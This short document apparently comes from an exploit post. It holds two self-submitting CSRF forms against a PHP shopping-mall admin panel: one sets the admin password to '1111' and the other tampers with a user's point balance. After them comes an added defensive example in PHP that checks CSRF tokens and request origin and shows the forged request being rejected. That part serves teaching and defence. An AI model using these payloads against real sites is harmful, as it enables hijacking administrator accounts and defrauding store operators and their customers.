Admin password change attack
<body onload="document.s_form.submit();">
<form name="s_form" id="s_form" action="/malladmin/main.php"
method="post" onSubmit='return install_check(this);'>
<input type="hidden" name="menushow" value="menu1">
<input type="hidden" name="theme" value="basicconfig/basic_info2">
<input type="hidden" name="action" value="admin_save">
<input type="hidden" value="admin" name="ID"/>
<input type="hidden" value="admin" name="ADMIN_NAME" />
<input type="hidden" value="1111" name="PASS" />
<input type="hidden" value="1111" name="PASS1" />
</form>
Point tampering attack
<body onload="document.csrf.submit();">
<form name="csrf" action='/lib/ajax.admin.php' method="post">
<input type="hidden" name="query" value="update">
<input type="hidden" name='oldid' value='hackhack12'>
<input type="hidden" name="smode" value="in_point">
<input type="hidden" value="userid" name="hackhack12"/>
<input type="hidden" value="point" name="9999" />
<input type="hidden" value="type" name="point" />
</form>
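Both forms above succeed only if the server acts on a POST that carries nothing but the victim's session cookie. The following is an added example, not code from the original post or from the application it targets: a server-side check, written in PHP because the targeted endpoints are PHP, that rejects such requests. The function names, the `csrf_token` field and the `https://shop.example` origin are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers: the names and the 'csrf_token' field are assumptions,
// not part of the application shown above.

// Issue one random token per session; embed it as a hidden field in every admin form.
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Allow a state-changing request only if it is a POST, carries the session's
// token, and (when the browser sent an Origin header) comes from our own origin.
function csrf_request_allowed(array $session, array $post, array $server, string $ownOrigin): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false; // actions such as admin_save must never run on GET
    }
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $ownOrigin) {
        return false; // form was posted from another site
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($expected) || !is_string($supplied) || $expected === '') {
        return false; // no token issued, or token missing/malformed
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Constructed requests: the auto-submitting form above vs. the genuine admin page.
$session = [];
$token = csrf_issue_token($session);
$forged = ['action' => 'admin_save', 'ID' => 'admin', 'PASS' => '1111', 'PASS1' => '1111'];
$legit = $forged + ['csrf_token' => $token];
$ownOrigin = 'https://shop.example';
var_dump(csrf_request_allowed($session, $forged, ['REQUEST_METHOD' => 'POST'], $ownOrigin));
var_dump(csrf_request_allowed($session, $legit, ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $ownOrigin], $ownOrigin));
```

In a real handler the arrays would be `$_SESSION`, `$_POST` and `$_SERVER`. A password change should additionally require the current password, which the first form shows the endpoint does not ask for.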